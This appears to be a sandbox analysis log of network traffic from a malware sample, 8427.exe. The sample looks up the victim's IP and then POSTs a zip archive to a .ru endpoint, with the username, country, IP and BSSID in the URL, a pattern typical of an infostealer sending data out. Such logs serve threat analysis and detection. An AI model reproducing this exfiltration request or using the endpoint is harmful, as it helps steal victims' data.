2023-11-18 09:02:45 UTC	10419	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	147.135.36.89	443	192.168.2.4	49758	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:45 UTC	10419	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:02:45 UTC	10419	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2023-11-18 09:02:45 UTC	10419	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	104.21.89.193	443	192.168.2.4	49761	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:47 UTC	10420	OUT	POST /cin.php?ownerid=1444&buildid=ww7legend&countp=0&countc=25&username=user&country=US&ipaddr=156.146.49.168&BSSID=1F8E0289C3&countw=0&rndtoken=Xzedin-807996411835&domaindetects=0 HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8dbe8d78956b347 Host: central-cee-doja.ru Content-Length: 83736 Expect: 100-continue Connection: Keep-Alive
2023-11-18 09:02:48 UTC	10420	IN	HTTP/1.1 100 Continue
2023-11-18 09:02:48 UTC	10420	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 65 38 64 37 38 39 35 36 62 33 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 30 68 6e 79 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a Data Ascii: -----------------------8dbe8d78956b347Content-Disposition: form-data; name="file"; filename="j0hny.zip"Content-Type: application/octet-stream
2023-11-18 09:02:48 UTC	10420	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 50 21 73 57 81 c8 99 4e 39 02 00 00 02 06 00 00 17 00 00 00 54 68 65 20 43 69 6e 6f 73 68 69 20 50 72 6f 6a 65 63 74 2e 74 78 74 6d 52 bd 92 9b 30 10 ee f5 14 7b d5 35 1e 17 ce 39 9e 49 95 9b 9b 34 69 d2 e4 05 04 08 2c 1b 24 2c 24 fb 48 75 85 8b 2b 52 04 98 f1 03 fa 49 b2 9c 10 2c 24 1e 1b 6b ff be 9f 15 70 bf 5d ef b7 77 f2 bd 02 40 38 77 b0 28 f4 71 ff 68 e7 33 ef 40 86 68 36 1c 1b 58 66 3a 46 50 de 30 fd 36 94 bb 90 6c c3 4c a8 81 0f da a9 61 44 6b c7 b4 57 d2 52 a0 86 b6 4d f0 6c 8c fd cc 75 86 3d 76 42 e0 ff 97 ab 87 a6 e9 86 b2 fa 3d 4e 16 3d 8a 9f a2 44 a3 8c ce 4b b8 52 40 32 41 f6 82 5d 7f ee b7 df ff 35 3f 53 d6 c2 5c df 60 77 04 06 4a c1 16 6b 1b ee a5 99 cb a0 d6 67 4b a6 7b 1e ae 38 90 2e df 16 a2 7a 34 46 dd 76 Data Ascii: PKP!sWN9The Cinoshi Project.txtmR0{59I4i,$,$Hu+RI,$kp]w@8w(qh3@h6Xf:FP06lLaDkWRMlu=vB=N=DKR@2A]5?S\`wJkgK{8.z4Fv
2023-11-18 09:02:48 UTC	10428	OUT	Data Raw: 57 fd d9 6e 71 bf 3f ae 90 e9 db ce f7 6b ff fb b1 b1 e7 a7 0d e9 a2 ab f7 f8 c4 c5 cf f8 8e bc be 2e 95 f9 a8 bb cf e5 6d 11 bd c9 70 a5 b5 47 b4 13 76 5d e6 c5 c3 e3 6c af 0f 20 1c 1a e9 47 90 a1 a4 52 93 9c b6 5f 4e 26 91 c8 1c da ba f8 5e 6f a7 60 8f 60 97 f3 29 de f7 5b 13 9e 76 cc de 8a f8 a5 c7 43 e2 7c 3a 21 0e d0 79 10 4f fb cb 75 f6 92 35 6c ab b8 6d ba 2a e0 b5 35 43 1d 8f c3 37 03 23 0d 98 4e df d3 d5 4c 2f b6 3a b9 f6 ad f7 a1 60 4f 51 41 4b 8d 1d b2 5b 94 ef e9 b5 78 39 cb 8f 71 7e bf 60 1d a2 b8 2c 2f a6 24 6c d3 2d b7 c1 3f 95 49 26 d7 be 35 04 61 12 2f 3d a1 7b 3e 6f 09 95 51 17 e1 d3 3d 55 4d 72 bf eb f7 6e 74 07 a3 e4 23 bc 56 7e 68 00 4e f9 a8 e9 d1 41 12 05 c0 e2 c9 27 35 a3 35 17 c6 c0 73 8d 5e 18 f0 11 54 d9 5d fd fa e5 22 b7 cd c7 Data Ascii: Wnq?k.mpGv]l GR_N&^o``)[vC\|:!yOu5lm*5C7#NL/:`OQAK[x9q~`,/$l-?I&5a/={>oQ=UMrnt#V~hNA'55s^T]"
2023-11-18 09:02:48 UTC	10436	OUT	Data Raw: 18 b0 c9 10 1f 67 db b8 9f 39 4e 58 e0 fd 28 c6 59 c4 f3 f3 a1 be e4 dd 6c 6b 22 aa b8 b0 b1 ce 1a c6 17 8e 98 af b9 72 67 65 32 22 66 46 b9 b7 54 ed ee 5e 2f 67 0a 2c 85 57 ba 4d d4 bd cb 80 95 86 b7 43 2c fe 12 c1 62 01 fb 3d da e2 c5 b7 93 5b 2f 0a 7f 55 3f 53 2b f2 0f 7c f0 e5 f5 98 ae 09 4d 2f cf cf 9c b5 37 5b 1e 7b 0b ff 9d cc b2 0b 91 77 de ba bf d1 81 7f e1 95 18 99 76 56 c3 3d b8 c0 64 c7 29 d4 46 7c 5b de 50 19 4d ac 7f f3 3e 5c 91 ef bc 6c 65 5e d8 72 a2 46 fb 82 5d 88 34 cb 93 16 63 a4 57 e5 98 4f 50 ba 8c df f9 63 c6 4d 99 e7 ca 82 2d b6 8e 38 0d fe 4e 21 a6 57 fa df 0c 0a af 95 c3 3d f6 66 1e fe f7 46 72 75 38 43 fd bc d4 79 be 5c dc ed 7a c9 54 09 44 bc 6f 57 a2 ca 92 6a d0 60 9c 4b 20 64 4d 5b 3c 76 ba db 33 47 42 a9 e6 01 e9 d6 9d 15 de Data Ascii: g9NX(Ylk"rge2"fFT^/g,WMC,b=[/U?S+\|M/7[{wvV=d)F\|[PM>\le^rF]4cWOPcM-8N!W=fFru8Cy\zTDoWj`K dM[<v3GB
2023-11-18 09:02:48 UTC	10444	OUT	Data Raw: 9d cf 9c b6 12 82 06 20 7f 64 6e 6d 12 df f6 24 28 73 89 ff 58 96 00 7c 6b fc 75 a5 ff f8 03 16 d9 0b ef 20 00 a7 2e 1e b9 74 3e b6 94 97 ba cd ff 29 f9 0c dc e4 07 df 15 49 7a c6 f6 9c fc 22 98 50 de 99 e4 60 ab bc 8a d9 c6 0e fc 99 96 98 ee 90 2a d5 9f 5e e6 73 c8 5e e2 8d 57 aa bb 4e 45 d2 0f 8f af 59 1f 45 0d 71 99 2a 6e 99 1b 97 1a 87 4d 57 f2 f5 cd 2b 0a 6e 40 6a 1e ae 33 07 67 27 c5 20 45 ba b9 9f bd fd 8b 65 d9 56 d8 41 ad 09 e7 f4 86 18 dc 0f 64 fc 5e a3 58 e6 8c bc 29 d7 38 24 68 dd de 63 b9 de 78 84 ba 34 69 42 00 b6 6c 87 e3 f4 42 19 4f 45 1a 17 84 7e e9 60 60 c1 ac 7a b7 76 ae af b7 6a df 44 55 c6 c2 d9 cd 84 aa 37 ef 65 27 27 80 3e 93 62 11 e9 41 0a 01 54 d9 29 20 72 13 61 16 15 11 96 fa 92 93 33 27 d9 32 d2 05 ea b4 a2 20 1a 24 87 38 e8 ff Data Ascii: dnm$(sX\|ku .t>)Iz"P`^s^WNEYEqnMW+n@j3g' EeVAd^X)8$hcx4iBlBOE~``zvjDU7e''>bAT) ra3'2 $8
2023-11-18 09:02:48 UTC	10452	OUT	Data Raw: 2d 35 fb ee 9e bd 9d 27 9c df ef 63 e7 7d 25 65 67 18 d7 ca 30 e0 3e 47 45 3b f9 69 05 73 5b d2 91 2a d8 39 cc 29 22 77 24 0b b7 2d e0 e6 88 68 e8 e5 ab 57 19 2b 57 69 bf 13 07 8c 46 8d 79 28 b5 42 0c 7e 3d cb 36 2c 97 d5 ea c3 19 6b bb 50 c5 2c 87 f7 e8 f6 9f 79 c5 46 6f af d3 29 06 28 89 21 2f 6e e2 92 65 f1 cb 3b 04 40 71 8f 66 f8 8e 8c 65 fd 8a a5 22 67 e5 e8 f0 5d 6d 4b 17 ed b2 72 f3 f4 3b 3d 06 31 c1 47 c9 11 a2 10 c3 5f b4 65 f1 26 ac 0d 76 9b 19 b7 ad d2 0b 35 de 74 04 8b 04 d8 35 6c e6 d9 f8 f1 62 20 a3 e7 a3 04 94 b0 69 f1 97 9d be 96 b2 5e 9f fb 28 d3 c9 b2 d3 d4 f7 70 52 a5 21 83 b5 64 64 91 61 b7 b0 31 80 09 a6 fe a2 c1 fe 78 72 2d 51 7e 67 49 a7 32 7a e1 0a 42 c2 c5 b1 61 b3 24 63 9b 7d 42 8f 3e 16 b6 37 5e 91 64 53 11 9a 55 60 fd 9b 95 a7 Data Ascii: -5'c}%eg0>GE;is[*9)"w$-hW+WiFy(B~=6,kP,yFo)(!/ne;@qfe"g]mKr;=1G_e&v5t5lb i^(pR!dda1xr-Q~gI2zBa$c}B>7^dSU`
2023-11-18 09:02:48 UTC	10460	OUT	Data Raw: 4d 6a b7 c0 71 cb d5 cb b4 c0 e3 fd e8 65 8e 1b ab 08 dc 39 b4 d1 da 68 15 f3 e3 76 bf 53 70 00 bd 83 81 96 c1 9e 80 ab ff 31 73 db 49 73 8d ca 49 c6 84 e0 47 61 30 04 ea da e3 a4 cb 71 9d 3a 81 fc 42 a6 1b 36 0c 9e 09 1a 9d 19 19 df c2 3f 6e 56 e0 0c 2e d7 2d bd 38 e6 b6 ea b5 9d e0 81 4f 97 ea 77 f7 91 a9 b8 fb 1f 73 d6 3e f0 bf 7e 09 ee cf 2a 93 16 09 7a 53 a7 44 b8 c4 c4 20 ce 20 33 06 fd ae 73 90 a0 48 d4 6d 62 be fa df 8c 2e 78 80 08 e7 ae a3 2e 5d 1b 77 34 5c ee 8e 07 6e 1c a4 a4 e1 81 3f f7 73 e6 53 16 ad f1 80 e7 7e 6f f8 d7 46 84 6d 58 66 94 04 4c e9 5c 06 49 24 88 26 34 48 51 8e 67 de 51 74 f0 b9 a8 77 b0 23 0c 6f 2b cb 40 1b 10 b2 69 5f 3f 2e 08 a9 a7 c2 cc 3f ae 0d c4 41 db b1 b3 31 af 2c 7e 4d 45 d3 87 30 5c d4 42 18 ea df ea e0 b3 97 8a 4e Data Ascii: Mjqe9hvSp1sIsIGa0q:B6?nV.-8Ows>~*zSD 3sHmb.x.]w4\n?sS~oFmXfL\I$&4HQgQtw#o+@i_?.?A1,~ME0\BN
2023-11-18 09:02:48 UTC	10468	OUT	Data Raw: cf 26 b8 25 4a 23 54 f8 b3 42 f1 dd 58 ac ed c3 3f 34 54 c7 9a ea 76 19 aa 47 e1 70 3d 62 16 16 a9 15 4d 95 7a 79 69 1b 8a af db 5b 66 c3 b6 8f 3f 31 46 77 d5 f6 6f 84 3c e9 77 1d 1e e0 51 fa 5c e5 7f 69 c5 4d 07 a6 ae 83 f2 54 4a d0 4b 8c bb 9d 4c 70 ce 8c fe 4f 3f 12 d1 69 6f ee 49 03 66 14 da 1d 9c b9 a2 c7 ff d6 f2 42 ce 7d 23 34 d5 fe cb c9 78 52 17 93 76 22 6a 7e e6 b4 51 98 84 90 ac bf 30 fc 8f f6 38 21 e1 7f 2c a7 0b ce dc 53 42 64 da de 13 ee c7 f1 63 a6 32 7a 82 79 60 49 3d 13 8d 85 0d c4 9f 23 21 b4 02 a8 b8 73 4c ca 34 1e 93 6a 5b 86 c1 4f 7d 97 d3 b2 d9 c0 93 0e cb 60 97 87 95 89 26 78 a0 c1 60 ef e2 57 46 79 e7 f1 90 d3 17 73 79 6b 1f 8a de 50 67 83 0e 10 9c 84 90 35 d6 ee 41 1d 6b 60 51 fa 00 ce c7 c4 6d 61 f0 26 b1 48 ff 37 28 72 5e da d4 Data Ascii: &%J#TBX?4TvGp=bMzyi[f?1Fwo<wQ\iMTJKLpO?ioIfB}#4xRv"j~Q08!,SBdc2zy`I=#!sL4j[O}`&x`WFysykPg5Ak`Qma&H7(r^
2023-11-18 09:02:48 UTC	10476	OUT	Data Raw: da de d8 30 70 26 46 1a a7 d1 41 79 02 fe ac 55 d7 26 6d 5e f5 3c 0d c7 2c 46 23 3d b5 9b b9 c1 92 79 52 ed 23 fc d1 4c 72 42 dc c7 15 6d 5d 66 1b e7 33 fb 2e 34 42 5a 70 4e e6 59 ed b5 cd 4c 2a fe 50 44 37 f2 f7 1e ac f9 14 7b 1a 2c 2b 46 ed 37 5e ba c7 39 0b 13 3a 75 04 33 f4 ab 33 cd bd 60 41 ea bd 67 58 dc 25 8b 1b f1 a1 b5 da ee 05 c5 db 4a 17 f3 3e 6c 05 da 28 b2 f0 dd 20 56 4e 4c ae 8f a8 d0 94 be 2e e0 b8 38 95 b2 9d 3d dc 78 53 2e d5 47 dc 4d d7 44 af a3 61 cd 89 51 d3 4f 6f 7c 09 f6 bb 92 04 f9 14 4d 94 31 b7 ec 81 2f 1a 70 fa 8f 55 0f 9e 77 1b 1a fe f6 fb 86 62 46 c0 cc 8b 8f 5b ba bf 1d 74 25 93 a6 08 83 3e bd b5 3d b6 e1 92 58 61 dd 97 39 a7 35 2f d6 cd 97 3a c4 c1 b1 59 98 1d e9 59 60 5e e3 29 74 74 8c 11 67 21 52 88 25 bd 2b 95 f6 5a 29 b2 Data Ascii: 0p&FAyU&m^<,F#=yR#LrBm]f3.4BZpNYL*PD7{,+F7^9:u33`AgX%J>l( VNL.8=xS.GMDaQOo\|M1/pUwbF[t%>=Xa95/:YY`^)ttg!R%+Z)
2023-11-18 09:02:48 UTC	10484	OUT	Data Raw: 23 c0 be 43 84 fa 92 20 f4 92 3f 4a 27 d5 ba 2e 67 61 ce 33 c7 2b 18 51 a3 3f 39 ba ef 6c ba ef d3 b9 96 bf 55 9d 7b 1d 7c a6 dd fc c4 d8 3c 52 f9 56 d3 9b 82 7b ba 25 46 a6 49 72 fb 22 45 fd e2 e7 ca 2b cc 9f fd e1 d3 39 25 27 a4 74 62 78 de 36 c3 83 4b 48 c9 ef c2 09 b7 1c 57 1f d5 cb e3 6f e2 c2 6d 3b 64 13 0c 46 f7 69 2e bb a0 dc 26 ea aa ee 09 5e ef a9 79 cf 16 85 23 3e 55 18 01 ec 8b 2c f0 dd af d2 f9 09 da 56 0d 7b e1 a0 36 01 bf d4 de fd 9b 39 9c a6 06 68 1f c0 c4 fd 34 92 68 d4 15 93 2a a2 c9 d8 4c d9 4e 65 84 86 ca 4d d9 27 37 58 ab f2 91 83 ff 99 4a 7d b4 8b 5e 82 da b6 a7 da 1f 36 c2 57 bd 27 c7 50 4f be f0 5f f3 54 58 3e f7 f6 67 17 a3 92 26 93 85 b7 df 40 4f da 3d 4e 0c 9b cf e2 8b b2 53 b1 4b de 45 d1 3c bd da d5 35 06 e7 3a 74 6a 63 ae 1a Data Ascii: #C ?J'.ga3+Q?9lU{\|<RV{%FIr"E+9%'tbx6KHWom;dFi.&^y#>U,V{69h4h*LNeM'7XJ}^6W'PO_TX>g&@O=NSKE<5:tjc
2023-11-18 09:02:48 UTC	10492	OUT	Data Raw: 2d 22 92 22 f9 7e 68 45 38 e5 44 ef ca 64 98 bb c6 9e 27 2e 1b 99 ba e4 bd 91 af 73 cd cf be 85 a8 9f 57 76 5c 4a 2b 74 6c e9 b1 93 b6 60 ef 17 f5 ae 4f 24 02 29 61 8d 43 ef 61 b4 20 f4 99 89 31 e1 fd a0 0a 7d ce 6f cf f5 9c fa 6e dc cf 8a 7f 9c 05 18 18 fe 09 84 f6 ff 13 83 70 72 b6 62 4e 54 4c 30 02 0f c6 29 76 0d 73 30 ef f5 9e 24 3d c5 9c 05 b9 d7 a1 41 62 4b 28 9f 06 62 9e b5 38 7a 20 27 fe 16 7d 8c 9e ba b6 7e 59 88 20 25 3e 8c 0e 87 49 e0 f7 f3 3b e9 60 11 43 25 7b 81 3c 0a 7a d3 87 ca 1a ad 07 fe 0a 28 c0 9c c7 68 dd f2 c4 eb a3 64 b6 8a d1 12 39 98 b0 c5 65 4e 7a b2 9e d8 b2 18 9f 1c b6 3c df 5b f4 61 4c 79 92 13 ab 2d 8b 46 d4 25 3b 6b f5 7e 23 9f 32 5a 6f c3 8b f2 17 c7 10 25 0f 22 24 c2 38 d8 32 61 b4 e6 77 d3 0d c7 31 15 8c f8 58 64 59 57 c5 Data Ascii: -""~hE8Dd'.sWv\J+tl`O$)aCa 1}onprbNTL0)vs0$=AbK(b8z '}~Y %>I;`C%{<z(hd9eNz<[aLy-F%;k~#2Zo%"$82aw1XdYW
2023-11-18 09:02:48 UTC	10500	OUT	Data Raw: 4c 59 77 5d 57 b6 7a c9 20 3c 54 68 d1 e3 3d ad 36 72 78 6a 32 9a ef ab 6e 95 f0 8b e4 a3 46 9a 54 b7 b9 dc 2f 8c d1 b2 1b 5f 18 64 18 8a 4c 5d ee de 52 64 8c 1e fd 1a 31 42 a9 67 e3 63 c3 ec af da c7 91 b9 d1 e8 42 65 fd 2d 22 21 a6 0c 87 f4 32 36 49 a5 94 fb 64 c8 7a f2 20 93 aa b8 9d 48 7e a0 9c 5b 56 c0 e7 62 f2 50 68 54 3e b7 34 6d 10 23 c9 0f 33 23 11 89 89 65 e2 49 fe ee cb ad bd 32 6f e0 c3 43 b8 1d 25 5c 69 d5 5d 63 83 5d 75 c3 78 3c bd 73 48 aa bc ac 45 d2 05 31 92 23 81 37 5a 35 52 1c 42 9a 30 26 66 3e 5b 13 17 3c 67 15 f1 61 17 cf ea c0 4b 20 07 5d c9 b4 a0 ed f7 17 5d ad 61 70 b9 52 78 a0 32 af 0e a5 9c 04 cd 9d 49 cf 92 8d e8 08 62 06 98 8a 5c 75 c2 2a ee 8c 0b 69 76 0f 22 81 19 7c bd 61 fe 9e ef cf e4 dd 6c c3 d1 c5 2d f6 21 c4 77 9a f5 d0 Data Ascii: LYw]Wz <Th=6rxj2nFT/_dL]Rd1BgcBe-"!26Idz H~[VbPhT>4m#3#eI2oC%\i]c]ux<sHE1#7Z5RB0&f>[<gaK ]]apRx2Ib\u*iv"\|al-!w
2023-11-18 09:02:48 UTC	10502	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 65 38 64 37 38 39 35 36 62 33 34 37 2d 2d 0d 0a Data Ascii: -----------------------8dbe8d78956b347--
2023-11-18 09:02:49 UTC	10502	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k1W6019MXhhZvqJ3tdo9oqvkT0ZuRBiWmbmdcMd4%2FjwZK%2B7wpI9Q%2BeiaZKx6rVgYelm54DMIShGIzAS8bOWM6L%2FyEhDy8PsQSnfJ6aoe2ym%2FLGrvEqMus3pGrVg4L1MCuv%2Fb%2Fq2q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f095efe23c4ca-SEA alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49761	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:47 UTC	10420	OUT	POST /cin.php?ownerid=1444&buildid=ww7legend&countp=0&countc=25&username=user&country=US&ipaddr=156.146.49.168&BSSID=1F8E0289C3&countw=0&rndtoken=Xzedin-807996411835&domaindetects=0 HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8dbe8d78956b347 Host: central-cee-doja.ru Content-Length: 83736 Expect: 100-continue Connection: Keep-Alive
2023-11-18 09:02:48 UTC	10420	IN	HTTP/1.1 100 Continue
2023-11-18 09:02:48 UTC	10420	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 65 38 64 37 38 39 35 36 62 33 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 30 68 6e 79 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a Data Ascii: -----------------------8dbe8d78956b347Content-Disposition: form-data; name="file"; filename="j0hny.zip"Content-Type: application/octet-stream
2023-11-18 09:02:48 UTC	10420	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 50 21 73 57 81 c8 99 4e 39 02 00 00 02 06 00 00 17 00 00 00 54 68 65 20 43 69 6e 6f 73 68 69 20 50 72 6f 6a 65 63 74 2e 74 78 74 6d 52 bd 92 9b 30 10 ee f5 14 7b d5 35 1e 17 ce 39 9e 49 95 9b 9b 34 69 d2 e4 05 04 08 2c 1b 24 2c 24 fb 48 75 85 8b 2b 52 04 98 f1 03 fa 49 b2 9c 10 2c 24 1e 1b 6b ff be 9f 15 70 bf 5d ef b7 77 f2 bd 02 40 38 77 b0 28 f4 71 ff 68 e7 33 ef 40 86 68 36 1c 1b 58 66 3a 46 50 de 30 fd 36 94 bb 90 6c c3 4c a8 81 0f da a9 61 44 6b c7 b4 57 d2 52 a0 86 b6 4d f0 6c 8c fd cc 75 86 3d 76 42 e0 ff 97 ab 87 a6 e9 86 b2 fa 3d 4e 16 3d 8a 9f a2 44 a3 8c ce 4b b8 52 40 32 41 f6 82 5d 7f ee b7 df ff 35 3f 53 d6 c2 5c df 60 77 04 06 4a c1 16 6b 1b ee a5 99 cb a0 d6 67 4b a6 7b 1e ae 38 90 2e df 16 a2 7a 34 46 dd 76 Data Ascii: PKP!sWN9The Cinoshi Project.txtmR0{59I4i,$,$Hu+RI,$kp]w@8w(qh3@h6Xf:FP06lLaDkWRMlu=vB=N=DKR@2A]5?S\`wJkgK{8.z4Fv
2023-11-18 09:02:48 UTC	10428	OUT	Data Raw: 57 fd d9 6e 71 bf 3f ae 90 e9 db ce f7 6b ff fb b1 b1 e7 a7 0d e9 a2 ab f7 f8 c4 c5 cf f8 8e bc be 2e 95 f9 a8 bb cf e5 6d 11 bd c9 70 a5 b5 47 b4 13 76 5d e6 c5 c3 e3 6c af 0f 20 1c 1a e9 47 90 a1 a4 52 93 9c b6 5f 4e 26 91 c8 1c da ba f8 5e 6f a7 60 8f 60 97 f3 29 de f7 5b 13 9e 76 cc de 8a f8 a5 c7 43 e2 7c 3a 21 0e d0 79 10 4f fb cb 75 f6 92 35 6c ab b8 6d ba 2a e0 b5 35 43 1d 8f c3 37 03 23 0d 98 4e df d3 d5 4c 2f b6 3a b9 f6 ad f7 a1 60 4f 51 41 4b 8d 1d b2 5b 94 ef e9 b5 78 39 cb 8f 71 7e bf 60 1d a2 b8 2c 2f a6 24 6c d3 2d b7 c1 3f 95 49 26 d7 be 35 04 61 12 2f 3d a1 7b 3e 6f 09 95 51 17 e1 d3 3d 55 4d 72 bf eb f7 6e 74 07 a3 e4 23 bc 56 7e 68 00 4e f9 a8 e9 d1 41 12 05 c0 e2 c9 27 35 a3 35 17 c6 c0 73 8d 5e 18 f0 11 54 d9 5d fd fa e5 22 b7 cd c7 Data Ascii: Wnq?k.mpGv]l GR_N&^o``)[vC\|:!yOu5lm*5C7#NL/:`OQAK[x9q~`,/$l-?I&5a/={>oQ=UMrnt#V~hNA'55s^T]"
2023-11-18 09:02:48 UTC	10436	OUT	Data Raw: 18 b0 c9 10 1f 67 db b8 9f 39 4e 58 e0 fd 28 c6 59 c4 f3 f3 a1 be e4 dd 6c 6b 22 aa b8 b0 b1 ce 1a c6 17 8e 98 af b9 72 67 65 32 22 66 46 b9 b7 54 ed ee 5e 2f 67 0a 2c 85 57 ba 4d d4 bd cb 80 95 86 b7 43 2c fe 12 c1 62 01 fb 3d da e2 c5 b7 93 5b 2f 0a 7f 55 3f 53 2b f2 0f 7c f0 e5 f5 98 ae 09 4d 2f cf cf 9c b5 37 5b 1e 7b 0b ff 9d cc b2 0b 91 77 de ba bf d1 81 7f e1 95 18 99 76 56 c3 3d b8 c0 64 c7 29 d4 46 7c 5b de 50 19 4d ac 7f f3 3e 5c 91 ef bc 6c 65 5e d8 72 a2 46 fb 82 5d 88 34 cb 93 16 63 a4 57 e5 98 4f 50 ba 8c df f9 63 c6 4d 99 e7 ca 82 2d b6 8e 38 0d fe 4e 21 a6 57 fa df 0c 0a af 95 c3 3d f6 66 1e fe f7 46 72 75 38 43 fd bc d4 79 be 5c dc ed 7a c9 54 09 44 bc 6f 57 a2 ca 92 6a d0 60 9c 4b 20 64 4d 5b 3c 76 ba db 33 47 42 a9 e6 01 e9 d6 9d 15 de Data Ascii: g9NX(Ylk"rge2"fFT^/g,WMC,b=[/U?S+\|M/7[{wvV=d)F\|[PM>\le^rF]4cWOPcM-8N!W=fFru8Cy\zTDoWj`K dM[<v3GB
